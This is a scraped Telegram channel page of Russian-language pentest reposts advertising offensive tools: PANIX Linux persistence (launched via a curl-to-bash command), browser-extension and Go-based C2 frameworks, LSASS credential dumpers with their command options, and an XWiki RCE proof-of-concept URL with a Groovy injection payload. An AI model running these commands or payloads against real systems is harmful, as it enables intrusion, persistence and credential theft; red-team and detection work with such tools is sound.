ch
Feedback
Fsecurity | HH

Fsecurity | HH

前往频道在 Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

显示更多
2 067
订阅者
-124 小时
-77 天
+230 天
帖子存档
Repost from Pentest HaT
🛡️ PANIX - Persistence Against *NIX v2.1.0 Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, п
🛡️ PANIX - Persistence Against *NIX v2.1.0 Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, предназначенный для пентестеров, инженеров по обнаружению, CTF энтузиастов и других. Уделено особое внимание функциональности, что делает его важным инструментом для понимания и реализации широкого спектра методов закрепления. Запуск:
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash
😹 Home #soft #shell #linux #pentest ✈️ Pentest HaT

🔗Ссылка: https://opennet.ru/62836/

Repost from AP Security
#soc Windows Eventlog ID's В данном репозитории собрана полезная информация для аналитиков безопасности в разрезе безопасности корпоративных доменов.

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from #memekatz
Когда уложил прод пэйлоадом из ChatGPT

Специальный фреймворк для потрошения браузеров. Типа "C2" со своим сервером, а агент устанавливается как расширение для браузера. Blog: https://medium.com/@darkrain2009/redext-browser-extension-based-command-control-framework-1eec1402f146 Soft: https://github.com/Darkrain2009/RedExt Возможностей там много, от просмотра данных, до скриншотов и захвата ввода) #c2 #pentest #redteam #creds

Repost from SecuriXy.kz
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893 PoC: /xwiki/bin/ge
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893 PoC:
<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
https://github.com/advisories/GHSA-rr6p-3pfg-562j

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from s0ld13r ch.
XiebroC2 - open-source аналог CobaltStrike из Китая 😏 XiebroC2 позиционируется как многофункциональный C2-фреймворк с телегр
XiebroC2 - open-source аналог CobaltStrike из Китая 😏 XiebroC2 позиционируется как многофункциональный C2-фреймворк с телеграм-нотификациями и поддержкой скриптов на Lua. Аналог Cobalt Strike, но с открытым кодом и фишками под RedTeam задачи ⌨️ Фичи 👈 1️⃣Кроссплатформеннный имплант на Golang под популярные семейства ОС 2️⃣Управление через client: файлы, процессы, сетевой трафик, инъекции, скриншоты, reverse shell/reverse proxy 3️⃣Возможность автоматически уведомлять о новых сессиях в Telegram Помимо 3 основных фич есть возможность писать собственные плагины, для расширения функциональности и многое другое 🚬 Едиственный минус который я для себя заметил, это то что клиент и сервер только под Windows, можно конечно обернуть под Wine но это уже будет совсем другая история 😔 🔗 Repo: https://github.com/INotGreen/XiebroC2.git 🔗 Plugins: https://github.com/INotGreen/Xiebro-Plugins 🔗 Demo: https://www.youtube.com/watch?v=iZpltGdu4Y4 @s0ld13r_ch

Repost from Pentest HaT
💻 ShadowDumper v2.0 Мощный инструмент, который позволяет сделать дамп памяти LSASS. Использует различные продвинутые техники
💻 ShadowDumper v2.0 Мощный инструмент, который позволяет сделать дамп памяти LSASS. Использует различные продвинутые техники, позволяя получить доступ к конфиденциальным данным.
.\ShadowDumper.exe 1
To dump lsass memory using unhooking technique to inject modified mimikatz binary [Token Elevation, SAM Dumping, Vault Credentials, Lsass Hashes Dumping].

.\ShadowDumper.exe 2
To dump lsass memory using unhooking technique to inject binary using direct syscalls with MDWD.

.\ShadowDumper.exe 3
To dump lsass memory using simple MiniDumpWriteDump API.

.\ShadowDumper.exe 4
To dump lsass memory using MINIDUMP_CALLBACK_INFORMATION callbacks and encrypt the dumps before writing on disk as per your choice.

.\ShadowDumper.exe 5
To dump lsass memory using process forking technique and encrypt the dumps before writing on disk as per your choice.

.\ShadowDumper.exe 6
To dump lsass memory using direct syscalls with MiniDumpWriteDump.

.\ShadowDumper.exe 7
To dump lsass memory using direct syscalls (native dump with needed streams for parsing offline).
  
.\ShadowDumper.exe 8
To decrypt the dump file before offline parsing with tools like (mimikatz or pypykatz).
Сборку осуществлять в 💻 Visual Studio 2019 (v142) или новее, также в релизах есть собранный бинарник 😹 Home 😹 Releases #redteam #soft #pentest #shadowdumper #lsass ✈️ Pentest HaT

Repost from AP Security
#pentest PoC CVE-2025-1094 В СУБД PostgreSQL обнаружена уязвимость внедрения SQL-кода, связанная с некорректной обработкой интерактивным инструментом PostgreSQL psql определенных недопустимых байтовых последовательностей в символах UTF-8. Затронуты все версии PostgreSQL до 17.3, 16.7, 15.11, 14.16 и 13.19. Познакомиться с эксплойтом можно по следующей ссылке.

Repost from APT
🔑 lsassStealer lsassStealer is a tool designed to dump the memory of the Windows process "lsass.exe". The dump is performed entirely in RAM, then compressed using the zlib library and fragmented for transmission via UDP packets disguised as NTP packets. This method helps reduce detection by security solutions such as Windows Defender and advanced Endpoint Detection and Response (EDR) tools. 🔗 Source: https://github.com/Aur3ns/lsassStealer #windows #lsass #edr #bypass

👉🏻

Fsecurity | HH - Telegram 频道 @hellohackingteam 的统计与分析